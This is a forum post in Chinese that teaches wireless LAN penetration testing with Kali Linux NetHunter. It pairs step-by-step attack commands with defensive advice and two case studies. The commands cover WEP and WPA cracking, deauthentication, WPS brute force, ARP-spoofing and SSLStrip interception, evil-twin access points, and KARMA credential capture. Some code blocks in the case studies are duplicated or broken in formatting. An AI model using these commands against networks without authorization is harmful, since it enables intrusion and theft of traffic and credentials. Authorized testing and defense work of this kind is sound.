简体中文 繁體中文 English 日本語 Deutsch 한국 사람 بالعربية TÜRKÇE português คนไทย Français

站内搜索

搜索

活动公告

11-02 12:46
10-23 09:32
通知:本站资源由网友上传分享,如有违规等问题请到版务模块进行投诉,将及时处理!
10-23 09:31
10-23 09:28
通知:签到时间调整为每日4:00(东八区)
10-23 09:26

移动安全测试实战使用Kali Linux NetHunter全面评估无线局域网安全漏洞与防护措施

3万

主题

423

科技点

3万

积分

大区版主

木柜子打湿

积分
31916

三倍冰淇淋无人之境【一阶】财Doro小樱(小丑装)立华奏以外的星空【二阶】⑨的冰沙

发表于 2025-9-22 14:20:00 | 显示全部楼层 |阅读模式 [标记阅至此楼]

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
1. 引言

在当今数字化时代,无线局域网(WLAN)已成为我们日常生活和工作中不可或缺的一部分。然而,随着无线技术的普及,相关的安全威胁也日益增加。移动安全测试成为评估和保护无线网络安全的重要手段。Kali Linux NetHunter作为一款专为Android设备设计的渗透测试平台,为安全研究人员和IT专业人员提供了强大的无线网络安全测试工具集。

本文将详细介绍如何使用Kali Linux NetHunter进行无线局域网安全测试,包括常见的安全漏洞评估方法、实际操作步骤以及相应的防护措施。通过本文,读者将能够全面了解无线网络安全的风险,并掌握使用移动设备进行安全评估的实用技能。

2. Kali Linux NetHunter简介

2.1 什么是Kali Linux NetHunter

Kali Linux NetHunter是基于Kali Linux的Android渗透测试平台,它将强大的Kali Linux工具集移植到了移动设备上。NetHunter由Offensive Security团队开发,专门针对Nexus和其他支持的Android设备。它不仅包含了Kali Linux中的所有安全工具,还增加了一些专门针对移动渗透测试的功能,如内置的无线网卡支持、HID键盘攻击等。

2.2 NetHunter的主要特性

NetHunter具有以下主要特性:

• 完整的Kali Linux工具集:包括nmap、Wireshark、Metasploit等数百种渗透测试工具
• 自定义内核:支持802.11无线注入和USB HID攻击
• 便携式渗透测试平台:将强大的安全测试工具集成到移动设备中
• 一键MANA Evil Access Point:轻松创建恶意接入点
• 内置键盘:支持HID攻击,可将设备转换为键盘
• BadUSB攻击支持:通过USB OTG连接进行攻击

2.3 NetHunter的安装与配置

在安装NetHunter之前,需要确保设备满足以下要求:

• 支持的Android设备(如Nexus、OnePlus等)
• 设备已解锁Bootloader
• 安装有自定义Recovery(如TWRP)
• 设备至少有5GB的可用存储空间

以下是安装NetHunter的基本步骤:

1. 备份数据:在开始之前,务必备份设备上的所有重要数据。
2. 解锁Bootloader:# 对于Nexus设备,首先启用开发者选项和USB调试
adb reboot bootloader
fastboot oem unlock
3. 安装自定义Recovery:# 下载适合设备的TWRP镜像
fastboot flash recovery twrp.img
fastboot reboot
4. 下载NetHunter:从官方网站下载适合设备的NetHunter ROM和ZIP包。
5. 安装NetHunter:将设备重启至Recovery模式选择”Install”并刷入NetHunter ZIP包可选:刷入Open GApps包以获取Google服务重启设备
6. 将设备重启至Recovery模式
7. 选择”Install”并刷入NetHunter ZIP包
8. 可选:刷入Open GApps包以获取Google服务
9. 重启设备
10. 初始配置:首次启动时,按照屏幕提示完成初始设置启动NetHunter应用,配置Kali chroot环境
11. 首次启动时,按照屏幕提示完成初始设置
12. 启动NetHunter应用,配置Kali chroot环境

备份数据:在开始之前,务必备份设备上的所有重要数据。

解锁Bootloader:
  1. # 对于Nexus设备,首先启用开发者选项和USB调试
  2. adb reboot bootloader
  3. fastboot oem unlock
复制代码

安装自定义Recovery:
  1. # 下载适合设备的TWRP镜像
  2. fastboot flash recovery twrp.img
  3. fastboot reboot
复制代码

下载NetHunter:从官方网站下载适合设备的NetHunter ROM和ZIP包。

安装NetHunter:

• 将设备重启至Recovery模式
• 选择”Install”并刷入NetHunter ZIP包
• 可选:刷入Open GApps包以获取Google服务
• 重启设备

初始配置:

• 首次启动时,按照屏幕提示完成初始设置
• 启动NetHunter应用,配置Kali chroot环境

安装完成后,需要进行一些基本配置:
  1. # 启动Kali终端
  2. # 更新软件包列表
  3. apt update
  4. # 升级已安装的软件包
  5. apt upgrade -y
  6. # 安装额外的无线工具
  7. apt install -y aircrack-ng kismet reaver wireshark
  8. # 配置网络接口
  9. ifconfig
  10. # 查看可用的无线接口
  11. iwconfig
复制代码

3. 无线局域网安全基础

3.1 WLAN安全概述

无线局域网(WLAN)使用无线电波而不是电缆来连接设备,这种开放性使其面临各种安全威胁。WLAN安全主要关注以下几个方面:

• 认证:确保只有授权用户可以访问网络
• 加密:保护数据传输的机密性
• 完整性:确保数据在传输过程中不被篡改
• 可用性:确保网络服务对授权用户始终可用

3.2 常见的WLAN安全协议

WEP是最早的WLAN安全协议,现在已被证明是不安全的。它使用RC4流加密算法,但存在严重的漏洞:

• 使用静态密钥
• 初始化向量(IV)空间小,容易重复
• 缺乏密钥管理机制

WPA是作为WEP的临时替代方案引入的,主要改进包括:

• 使用临时密钥完整性协议(TKIP)
• 增加了消息完整性检查(MIC)
• 引入了802.1X/EAP认证机制

WPA2是目前最广泛使用的WLAN安全协议,它提供了:

• 使用强加密的AES-CCMP
• 增强的安全机制
• 更强的密钥管理

WPA3是最新的WLAN安全协议,主要改进包括:

• 更强的加密,即使使用弱密码也能提供更好的保护
• 针对公共网络的个性化数据加密
• 更强的密钥交换协议
• 防御离线字典攻击

3.3 常见的WLAN安全漏洞

使用弱密码或默认密码的WLAN容易被暴力破解或字典攻击。

WEP协议本身存在设计缺陷,可以在几分钟内被破解。

WPS功能存在设计缺陷,允许攻击者在几小时内获取WPA/WPA2预共享密钥。

攻击者可以在客户端和接入点之间拦截、修改或注入数据。

攻击者可以设置与合法网络相似的恶意接入点,诱骗用户连接。

攻击者可以发送伪造的去认证包,强制客户端断开与接入点的连接。

利用设备自动连接已知网络的特性,诱骗设备连接到恶意接入点。

4. 使用NetHunter进行WLAN安全测试

4.1 准备工作

在开始WLAN安全测试之前,需要做一些准备工作:

• 支持监听模式和注入模式的无线网卡(如Alfa AWUS036H、AWUS036ACH等)
• USB OTG适配器(用于连接外部无线网卡)
• 充满电的Android设备或移动电源

确保NetHunter已正确安装并配置,更新所有工具:
  1. # 更新软件包列表
  2. apt update
  3. # 升级已安装的软件包
  4. apt upgrade -y
  5. # 安装无线测试工具
  6. apt install -y aircrack-ng kismet reaver wireshark
复制代码

在进行任何安全测试之前,必须确保:

• 获得网络所有者的明确授权
• 测试不会影响网络的正常运行
• 遵守当地法律法规

4.2 无线网络发现

airodump-ng是Aircrack-ng套件中的一个工具,用于捕获无线数据包并显示周围的无线网络。
  1. # 启动无线接口的监听模式
  2. airmon-ng start wlan0
  3. # 扫描周围的无线网络
  4. airodump-ng wlan0mon
复制代码

输出将显示周围的无线网络,包括BSSID、信道、加密方式、ESSID等信息。

Kismet是一个强大的无线网络检测、嗅探和入侵检测系统。
  1. # 启动Kismet
  2. kismet -c wlan0mon
复制代码

Kismet将显示周围的无线网络,并提供更详细的信息,如网络类型、客户端数量等。

4.3 WEP网络破解

WEP加密已被证明是不安全的,可以相对容易地被破解。以下是使用NetHunter破解WEP网络的步骤:
  1. # 启动无线接口的监听模式
  2. airmon-ng start wlan0
  3. # 捕获目标网络的数据包
  4. airodump-ng --bssid [目标BSSID] -c [信道] -w wep_capture wlan0mon
复制代码

为了加速数据包捕获,可以注入ARP请求:
  1. # 产生ARP请求
  2. aireplay-ng -3 -b [目标BSSID] -h [源MAC] wlan0mon
复制代码

当捕获了足够的数据包(通常需要10,000到50,000个IVS)后,可以尝试破解WEP密钥:
  1. # 破解WEP密钥
  2. aircrack-ng -b [目标BSSID] wep_capture-01.cap
复制代码

如果捕获了足够的数据包,aircrack-ng将显示破解出的WEP密钥。

4.4 WPA/WPA2-PSK网络破解

与WEP不同,WPA/WPA2-PSK网络需要捕获握手包,然后使用字典攻击来破解预共享密钥。
  1. # 启动无线接口的监听模式
  2. airmon-ng start wlan0
  3. # 捕获目标网络的数据包
  4. airodump-ng --bssid [目标BSSID] -c [信道] -w wpa_capture wlan0mon
复制代码

为了捕获握手包,可以发送去认证包强制客户端重新连接:
  1. # 发送去认证包
  2. aireplay-ng -0 10 -a [目标BSSID] -c [客户端MAC] wlan0mon
复制代码

当捕获到握手包后,可以使用字典攻击来破解预共享密钥:
  1. # 使用aircrack-ng破解
  2. aircrack-ng -w [字典文件] -b [目标BSSID] wpa_capture-01.cap
  3. # 或者使用hashcat破解(更快)
  4. hashcat -m 2500 -a 0 -w 3 wpa_capture.hccapx [字典文件]
复制代码

4.5 WPS攻击

WPS功能存在设计缺陷,允许攻击者在几小时内获取WPA/WPA2预共享密钥。

Reaver是专门针对WPS漏洞的工具:
  1. # 启动无线接口的监听模式
  2. airmon-ng start wlan0
  3. # 使用Reaver进行WPS攻击
  4. reaver -i wlan0mon -b [目标BSSID] -c [信道] -vv
复制代码

Reaver将尝试使用PIN暴力破解WPS,如果成功,将显示WPA/WPA2预共享密钥。

Bully是另一个针对WPS漏洞的工具,通常比Reaver更稳定:
  1. # 使用Bully进行WPS攻击
  2. bully -b [目标BSSID] -c [信道] -v 4 wlan0mon
复制代码

4.6 中间人攻击

中间人攻击(MITM)允许攻击者在客户端和接入点之间拦截、修改或注入数据。

Ettercap是一个强大的中间人攻击工具:
  1. # 启动IP转发
  2. echo 1 > /proc/sys/net/ipv4/ip_forward
  3. # 启动Ettercap
  4. ettercap -i wlan0 -T -q -M ARP:remote // [目标IP] //
复制代码

SSLStrip可以将HTTPS连接降级为HTTP,从而拦截加密流量:
  1. # 启动IP转发和iptables规则
  2. echo 1 > /proc/sys/net/ipv4/ip_forward
  3. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  4. # 启动SSLStrip
  5. sslstrip -l 10000
复制代码

4.7 恶意接入点

恶意接入点(Evil Twin)是攻击者设置的与合法网络相似的恶意接入点,诱骗用户连接。
  1. # 启动无线接口的监听模式
  2. airmon-ng start wlan0
  3. # 创建恶意接入点
  4. airbase-ng -e [合法网络名称] -c [信道] wlan0mon
复制代码
  1. # 配置网络接口
  2. ifconfig at0 up
  3. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  4. # 启动DHCP服务器
  5. dhcpd -cf /etc/dhcpd.conf at0
  6. # 启动DNS服务器(如dnsspoof)
  7. dnsspoof -i at0
复制代码

4.8 KARMA攻击

KARMA攻击利用设备自动连接已知网络的特性,诱骗设备连接到恶意接入点。

Mana Toolkit是一个专门用于KARMA攻击的工具集:
  1. # 启动Mana Toolkit
  2. systemctl start mana
  3. # 配置Mana Toolkit
  4. cd /etc/mana-toolkit/
  5. nano mana.conf
复制代码

编辑mana.conf文件,设置恶意接入点的参数。
  1. # 查看连接的设备
  2. mana-toolkit mana-www
  3. # 查看捕获的凭证
  4. tail -f /var/lib/mana-toolkit/hostapd-mana.log
复制代码

5. WLAN安全防护措施

5.1 加强WLAN安全配置

• 升级到WPA3:如果设备支持,使用最新的WPA3加密协议
• 使用WPA2-AES:如果WPA3不可用,确保使用WPA2-AES而不是WPA2-TKIP
• 禁用WEP:完全避免使用不安全的WEP加密

• 密码长度:使用至少12个字符的密码
• 密码复杂性:包含大小写字母、数字和特殊字符
• 避免常见密码:避免使用字典单词、常见短语或个人信息
• 定期更换密码:定期更换Wi-Fi密码

WPS功能存在严重的安全漏洞,建议禁用:
  1. # 在路由器管理界面中禁用WPS
  2. # 通常在无线设置或高级设置中可以找到WPS选项
复制代码

5.2 网络隔离与分段

为访客创建独立的网络,隔离访客设备与内部网络:
  1. # 在路由器中配置访客网络
  2. # 通常在无线设置中可以找到访客网络选项
复制代码

使用VLAN技术将网络分为不同的安全区域:
  1. # 配置VLAN示例(Cisco交换机)
  2. switch(config)# vlan 10
  3. switch(config-vlan)# name internal
  4. switch(config-vlan)# exit
  5. switch(config)# vlan 20
  6. switch(config-vlan)# name guest
  7. switch(config-vlan)# exit
  8. # 将端口分配到VLAN
  9. switch(config)# interface fastethernet 0/1
  10. switch(config-if)# switchport mode access
  11. switch(config-if)# switchport access vlan 10
  12. switch(config-if)# exit
复制代码

5.3 无线入侵检测与防御系统

无线入侵检测系统(WIDS)和无线入侵防御系统(WIPS)可以检测和防止无线攻击:
  1. # 使用Kismet作为WIDS
  2. kismet -c wlan0mon -n
  3. # 配置Kismet警报
  4. nano ~/.kismet/kismet.conf
复制代码

定期监控无线网络活动,发现异常行为:
  1. # 使用airodump-ng监控网络活动
  2. airodump-ng --bssid [目标BSSID] -c [信道] --write-interval 60 wlan0mon
  3. # 使用tshark分析捕获的数据
  4. tshark -r capture-01.cap -Y "wlan.fc.type_subtype == 0x0c"  # 查看去认证包
复制代码

5.4 加强认证机制

802.1X/EAP提供了更强大的认证机制,特别适合企业环境:
  1. # 配置FreeRADIUS服务器示例
  2. apt install freeradius
  3. # 编辑客户端配置
  4. nano /etc/freeradius/clients.conf
  5. # 编辑用户配置
  6. nano /etc/freeradius/users
复制代码

虽然MAC地址过滤可以被绕过,但它提供了一层额外的安全:
  1. # 在路由器中配置MAC地址过滤
  2. # 通常在无线设置或安全设置中可以找到MAC过滤选项
复制代码

5.5 定期安全评估

使用NetHunter等工具定期进行无线网络渗透测试:
  1. # 使用NetHunter进行定期安全评估
  2. # 创建自动化脚本
  3. nano wlan_security_test.sh
  4. # 添加以下内容
  5. #!/bin/bash
  6. # 启动无线接口的监听模式
  7. airmon-ng start wlan0
  8. # 扫描周围的无线网络
  9. airodump-ng wlan0mon --write scan_results
  10. # 检查WPS漏洞
  11. reaver -i wlan0mon -b [目标BSSID] -c [信道] -vv
  12. # 停止监听模式
  13. airmon-ng stop wlan0mon
复制代码

定期更新路由器固件和客户端软件,修复已知的安全漏洞:
  1. # 检查路由器固件更新
  2. # 通常在管理界面的系统或固件更新部分
  3. # 更新NetHunter和工具
  4. apt update
  5. apt upgrade -y
复制代码

6. 实战案例分析

6.1 案例一:企业WLAN安全评估

某中型企业希望评估其无线网络的安全性,防止潜在的数据泄露和未授权访问。

使用NetHunter进行全面的无线安全评估:

1. 网络发现:
“`bash启动无线接口的监听模式airmon-ng start wlan0

网络发现:
“`bash

airmon-ng start wlan0

# 扫描周围的无线网络
   airodump-ng wlan0mon –write enterprise_scan
  1. 2. **识别目标网络**:
  2.    - 发现企业使用WPA2-PSK加密
  3.    - 识别出多个接入点,覆盖不同区域
  4.    - 发现WPS功能已启用
  5. 3. **WPS漏洞测试**:
  6.    ```bash
  7.    # 测试WPS漏洞
  8.    reaver -i wlan0mon -b [企业BSSID] -c [信道] -vv
复制代码

1.
  1. 密码强度测试:
  2. “`bash捕获握手包airodump-ng –bssid [企业BSSID] -c [信道] -w enterprise_handshake wlan0mon
复制代码

密码强度测试:
“`bash

airodump-ng –bssid [企业BSSID] -c [信道] -w enterprise_handshake wlan0mon

# 发送去认证包
   aireplay-ng -0 10 -a [企业BSSID] -c [客户端MAC] wlan0mon

# 使用字典攻击测试密码强度
   aircrack-ng -w rockyou.txt -b [企业BSSID] enterprise_handshake-01.cap
  1. 5. **中间人攻击测试**:
  2.    ```bash
  3.    # 启动IP转发
  4.    echo 1 > /proc/sys/net/ipv4/ip_forward
  5.    
  6.    # 启动Ettercap
  7.    ettercap -i wlan0 -T -q -M ARP:remote // [目标IP] //
复制代码

1. WPS功能存在漏洞,可以被暴力破解
2. 部分区域使用弱密码,容易被字典攻击破解
3. 缺乏网络隔离,访客网络与内部网络未分离
4. 没有实施802.1X/EAP认证
5. 缺乏无线入侵检测系统

1. 禁用WPS功能
2. 更换强密码,使用至少12个字符的复杂密码
3. 实施网络隔离,创建独立的访客网络
4. 部署802.1X/EAP认证系统
5. 安装WIDS/WIPS系统,监控无线活动
6. 定期进行安全评估和渗透测试

6.2 案例二:公共Wi-Fi安全测试

某咖啡店提供免费公共Wi-Fi,但担心可能存在的安全风险,希望评估其安全性。

使用NetHunter对公共Wi-Fi进行安全测试:

1. 网络发现:
“`bash启动无线接口的监听模式airmon-ng start wlan0

网络发现:
“`bash

airmon-ng start wlan0

# 扫描周围的无线网络
   airodump-ng wlan0mon –write public_wifi_scan
  1. 2. **识别目标网络**:
  2.    - 发现咖啡店使用开放网络(无加密)
  3.    - 使用强制门户进行认证
  4. 3. **恶意接入点测试**:
  5.    ```bash
  6.    # 创建恶意接入点
  7.    airbase-ng -e "CoffeeShop_Free_WiFi" -c [信道] wlan0mon
  8.    
  9.    # 配置DHCP和DNS服务器
  10.    ifconfig at0 up
  11.    ifconfig at0 10.0.0.1 netmask 255.255.255.0
  12.    dhcpd -cf /etc/dhcpd.conf at0
  13.    dnsspoof -i at0
复制代码

1. 中间人攻击测试:
“`bash启动IP转发和iptables规则echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

中间人攻击测试:
“`bash

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

# 启动SSLStrip
   sslstrip -l 10000
  1. 5. **凭证捕获测试**:
  2.    ```bash
  3.    # 使用Ettercap捕获凭证
  4.    ettercap -i wlan0 -T -q -M ARP:remote // //
复制代码

1. 使用开放网络,没有加密保护
2. 强制门户使用HTTP,而不是HTTPS
3. 容易受到中间人攻击
4. 没有隔离用户之间的流量
5. 没有警告用户潜在的安全风险

1. 实施WPA2/WPA3加密,即使对于公共网络
2. 使用HTTPS强制门户,而不是HTTP
3. 实施客户端隔离,防止用户之间的流量
4. 提供VPN服务,增强用户数据保护
5. 在登录页面显示安全警告,提醒用户潜在风险
6. 定期监控网络活动,检测异常行为

7. 结论与展望

7.1 总结

本文详细介绍了如何使用Kali Linux NetHunter进行无线局域网安全测试,包括:

• Kali Linux NetHunter的安装与配置
• 无线局域网安全基础和常见漏洞
• 使用NetHunter进行各种无线安全测试的方法
• 针对不同类型攻击的防护措施
• 实际案例分析和解决方案

通过使用NetHunter,安全研究人员和IT专业人员可以方便地在移动设备上进行全面的无线安全评估,发现潜在的安全漏洞并采取相应的防护措施。

7.2 未来发展趋势

随着无线技术的不断发展,无线安全领域也面临新的挑战和机遇:

1. WPA3的普及:随着WPA3的逐渐普及,无线网络的安全性将得到显著提高,但也可能出现新的漏洞。
2. 5G和Wi-Fi 6:新一代无线技术的广泛应用将带来新的安全挑战,需要开发相应的安全测试工具和方法。
3. 物联网安全:随着物联网设备的普及,无线安全测试将需要涵盖更多类型的设备和协议。
4. AI驱动的安全:人工智能和机器学习技术将被应用于无线安全检测和防御,提高自动化和智能化水平。
5. 移动安全测试平台:像NetHunter这样的移动安全测试平台将继续发展,提供更强大、更便捷的功能。

WPA3的普及:随着WPA3的逐渐普及,无线网络的安全性将得到显著提高,但也可能出现新的漏洞。

5G和Wi-Fi 6:新一代无线技术的广泛应用将带来新的安全挑战,需要开发相应的安全测试工具和方法。

物联网安全:随着物联网设备的普及,无线安全测试将需要涵盖更多类型的设备和协议。

AI驱动的安全:人工智能和机器学习技术将被应用于无线安全检测和防御,提高自动化和智能化水平。

移动安全测试平台:像NetHunter这样的移动安全测试平台将继续发展,提供更强大、更便捷的功能。

7.3 最佳实践建议

为了确保无线网络的安全,建议采取以下最佳实践:

1. 定期安全评估:使用NetHunter等工具定期进行无线安全评估,及时发现和修复安全漏洞。
2. 多层防御:实施多层安全措施,包括强加密、网络隔离、入侵检测等。
3. 持续监控:部署WIDS/WIPS系统,持续监控无线网络活动,及时发现异常行为。
4. 安全意识培训:提高用户的安全意识,教育用户识别和避免无线安全威胁。
5. 保持更新:定期更新路由器固件和安全工具,修复已知的安全漏洞。

定期安全评估:使用NetHunter等工具定期进行无线安全评估,及时发现和修复安全漏洞。

多层防御:实施多层安全措施,包括强加密、网络隔离、入侵检测等。

持续监控:部署WIDS/WIPS系统,持续监控无线网络活动,及时发现异常行为。

安全意识培训:提高用户的安全意识,教育用户识别和避免无线安全威胁。

保持更新:定期更新路由器固件和安全工具,修复已知的安全漏洞。

通过采取这些措施,可以显著提高无线网络的安全性,保护敏感数据免受未授权访问和攻击。

8. 参考资料

1. Offensive Security. (2023). Kali Linux NetHunter Documentation.https://www.kali.org/get-kali/#kali-mobile
2. Aircrack-ng. (2023). Aircrack-ng Documentation.https://www.aircrack-ng.org/doku.php
3. Kismet. (2023). Kismet Wireless Network Detector.https://www.kismetwireless.net/
4. Reaver. (2023). Reaver WPS Attack Tool.https://code.google.com/archive/p/reaver-wps/
5. Wi-Fi Alliance. (2023). Wi-Fi Security.https://www.wi-fi.org/security
6. IEEE. (2023). IEEE 802.11 Wireless LAN Standards.https://standards.ieee.org/standard/802_11-2020.html
7. Tenable. (2023). Wireless Network Security.https://www.tenable.com/blog/wireless-network-security
8. SANS Institute. (2023). Wireless Security Policy Guidelines.https://www.sans.org/white-papers/
9. OWASP. (2023). Wireless Security.https://owasp.org/www-project-wireless-security-top-10/
10. NIST. (2023). Guidelines for Securing Wireless Local Area Networks (WLANs).https://csrc.nist.gov/publications/detail/sp/800-153/final

Offensive Security. (2023). Kali Linux NetHunter Documentation.https://www.kali.org/get-kali/#kali-mobile

Aircrack-ng. (2023). Aircrack-ng Documentation.https://www.aircrack-ng.org/doku.php

Kismet. (2023). Kismet Wireless Network Detector.https://www.kismetwireless.net/

Reaver. (2023). Reaver WPS Attack Tool.https://code.google.com/archive/p/reaver-wps/

Wi-Fi Alliance. (2023). Wi-Fi Security.https://www.wi-fi.org/security

IEEE. (2023). IEEE 802.11 Wireless LAN Standards.https://standards.ieee.org/standard/802_11-2020.html

Tenable. (2023). Wireless Network Security.https://www.tenable.com/blog/wireless-network-security

SANS Institute. (2023). Wireless Security Policy Guidelines.https://www.sans.org/white-papers/

OWASP. (2023). Wireless Security.https://owasp.org/www-project-wireless-security-top-10/

NIST. (2023). Guidelines for Securing Wireless Local Area Networks (WLANs).https://csrc.nist.gov/publications/detail/sp/800-153/final
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

频道订阅

频道订阅

加入社群

加入社群

联系我们|TG频道|RSS

Powered by Pixtech

© 2025 Pixtech Team.